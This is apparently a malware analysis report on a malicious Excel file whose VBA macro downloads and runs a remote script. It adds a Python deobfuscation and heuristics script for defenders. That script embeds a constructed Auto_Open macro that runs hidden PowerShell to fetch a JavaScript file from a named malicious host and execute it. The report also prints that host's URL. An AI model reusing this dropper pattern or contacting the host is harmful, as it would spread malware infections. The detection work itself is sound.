Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 5b35ee161073781a…

MALICIOUS

Office (OLE) / .XLS

Size: 33.0 KB | Created: 2015-06-05 18:17:20 | Authoring application: Microsoft Excel | First seen: 2022-10-12
MD5: 99df9946cb44e65a25d1d6dc3c264d0f SHA-1: a1d2a73e79abb0fbc792b71480814988cfd6a40c SHA-256: 5b35ee161073781a71c51ddf6416fdfca862887d5dfd4e22d2914c816dc32093
Risk score: 100

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The embedded VBA macro contains obfuscated PowerShell commands. The script reconstructs the URL 'http://nedremmer.com/paradigm/client/download.js' at runtime (the URL does not appear as a single string literal), downloads the file to the temporary directory as 'notapad.js' and executes it. This is downloader/dropper behaviour: the spreadsheet itself carries no payload, so the final stage depends on the remote host still serving the script.

Heuristics 3

  • SC_STR_POWERSHELL (high): Reference to PowerShell
  • OLE_VBA_CREATEOBJ (high): CreateObject call
  • OLE_VBA_MACROS (medium): Document contains VBA macro code
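The Malware Insights paragraph and the string heuristics above hinge on one point: a macro that builds "powershell" and the URL out of fragments defeats a naive grep of the raw VBA, so the analyst has to fold the obfuscation first. The script below is an added example written for this report, not code from the analysis service or from the sample; it folds the cheap tricks downloaders use (Chr(), StrReverse(), "a" & "b" concatenation, variables holding a single literal), then extracts URLs and runs checks mirroring the SC_STR_POWERSHELL and OLE_VBA_CREATEOBJ heuristics. The VBA text inside it is constructed for illustration and is not the carved macros.bas; the PowerShell command line, the WScript.Shell usage and the VBA_AUTOEXEC check name are my assumptions, only the URL and the 'notapad.js' filename come from the report.

```python
"""Triage helper for decoded VBA macro source (e.g. olevba output):
fold cheap string obfuscation, then extract URLs and run string heuristics."""
import re
from typing import Dict

# Constructed stand-in for a decoded macro (NOT the sample's macros.bas).
# The report's URL is spread over literals, Chr() and StrReverse(), and
# "powershell" is split in two, so no single literal contains either.
SAMPLE_VBA = r'''
Sub Auto_Open()
    Dim u As String, p As String
    u = "http" & Chr(58) & "//nedremmer.com/" & "paradigm/client/" & StrReverse("sj.daolnwod")
    p = Environ("TEMP") & "\notapad.js"
    Set sh = CreateObject("WScr" & "ipt.Shell")
    sh.Run "power" & "shell -w hidden -c (New-Object Net.WebClient).DownloadFile('" & u & "','" & p & "'); wscript '" & p & "'", 0
End Sub
'''

_LIT = r'"([^"]*)"'  # VBA string literal (doubled-quote escapes not handled)
_CONCAT = re.compile(_LIT + r'\s*&\s*' + _LIT)
_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*' + _LIT + r'\s*$', re.M)


def fold_literals(text: str) -> str:
    """Merge adjacent "a" & "b" literals until a pass changes nothing."""
    prev = None
    while prev != text:
        prev = text
        text = _CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), text)
    return text


def deobfuscate(vba: str) -> str:
    """Undo StrReverse(), Chr()/ChrW() and concatenation, then propagate
    variables whose whole value has collapsed to one literal."""
    out = re.sub(r'StrReverse\(' + _LIT + r'\)',
                 lambda m: '"%s"' % m.group(1)[::-1], vba, flags=re.I)
    out = re.sub(r'Chr[WB$]?\((\d+)\)',
                 lambda m: '"%s"' % chr(int(m.group(1))), out, flags=re.I)
    out = fold_literals(out)
    for var, lit in _ASSIGN.findall(out):
        # replace "... " & var & " ..." with the literal, then fold again
        out = re.sub(r'&\s*' + re.escape(var) + r'\s*&',
                     lambda m, lit=lit: '& "%s" &' % lit, out)
    return fold_literals(out)


HEURISTICS = {
    "SC_STR_POWERSHELL": re.compile(r'powershell', re.I),
    "OLE_VBA_CREATEOBJ": re.compile(r'\bCreateObject\s*\(', re.I),
    # name chosen for this example (not one of the report's IDs):
    # entry points that run without user interaction beyond opening
    "VBA_AUTOEXEC": re.compile(r'\b(Auto_Open|AutoOpen|Workbook_Open|Document_Open)\b', re.I),
}
URL = re.compile(r'https?://[^\s"\'<>]+')


def run_heuristics(text: str) -> Dict[str, bool]:
    return {name: bool(rx.search(text)) for name, rx in HEURISTICS.items()}


def analyze(vba: str) -> dict:
    """Heuristics on the raw and the folded source, plus URLs found after folding."""
    clean = deobfuscate(vba)
    return {
        "hits_raw": run_heuristics(vba),
        "hits": run_heuristics(clean),
        "urls": sorted(set(URL.findall(clean))),
        "deobfuscated": clean,
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_VBA)
    for key in ("hits_raw", "hits", "urls"):
        print(key, result[key])
    print(result["deobfuscated"])
```

On the constructed macro, SC_STR_POWERSHELL is false against the raw text and true after folding, which is exactly why a scanner that only greps literals misses samples like this one; the folded Run line also shows the full download-and-execute command and the reconstructed URL. Real macros add Replace(), Mid(), arithmetic on char codes and doubled-quote escapes, so treat this as a first pass before reading the macro by hand or emulating it (e.g. with ViperMonkey).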

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: c0ad471d207a7af4c24b5b4392366c67c5245df368ed4acc655eb0d592346745
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1493 bytes